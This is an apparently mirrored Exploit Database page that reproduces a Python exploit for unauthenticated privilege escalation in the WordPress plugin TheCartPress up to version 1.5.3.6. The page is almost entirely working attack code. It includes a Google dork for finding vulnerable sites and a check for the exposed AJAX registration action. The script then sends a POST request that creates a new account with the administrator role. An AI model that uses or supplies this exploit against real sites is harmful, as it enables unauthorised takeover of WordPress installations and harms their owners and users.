WordPress Plugin TheCartPress 1.5.3.6 – Privilege Escalation (Unauthenticated)

• Exploit Database
• 156 阅读

• 作者： spacehen
  日期： 2021-10-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50378/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

  # Exploit Title: WordPress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated) # Google Dork: inurl:/wp-content/plugins/thecartpress/ # Date: 04/10/2021 # Exploit Author: spacehen # Vendor Homepage: https://wordpress.org/plugin/thecartpress # Version: <= 1.5.3.6 # Tested on: Ubuntu 20.04.1   import os.path from os import path import json import requests; import sys   def print_banner(): print("TheCartPress <= 1.5.3.6 - Unauthenticated Privilege Escalation") print("Author -> space_hen (www.github.com/spacehen)") def print_usage(): print("Usage: python3 exploit.py [target url]") print("Ex: python3 exploit.py https://example.com")   def vuln_check(uri): response = requests.get(uri) raw = response.text if ("User name is required" in raw): return True; else: return False;   def main():   print_banner() if(len(sys.argv) != 2): print_usage(); sys.exit(1);   base = sys.argv[1]   ajax_action = &apos;tcp_register_and_login_ajax&apos; admin = &apos;/wp-admin/admin-ajax.php&apos;;   uri = base + admin + &apos;?action=&apos; + ajax_action ; check = vuln_check(uri);   if(check == False): print("(*) Target not vulnerable!"); sys.exit(1)   data = { "tcp_new_user_name" : "admin_02", "tcp_new_user_pass" : "admin1234", "tcp_repeat_user_pass" : "admin1234", "tcp_new_user_email" : "test@test.com", "tcp_role" : "administrator" } print("Inserting admin..."); response = requests.post(uri, data=data ) if (response.text == "\"\""): print("Success!") print("Now login at /wp-admin/") else: print(response.text)   main();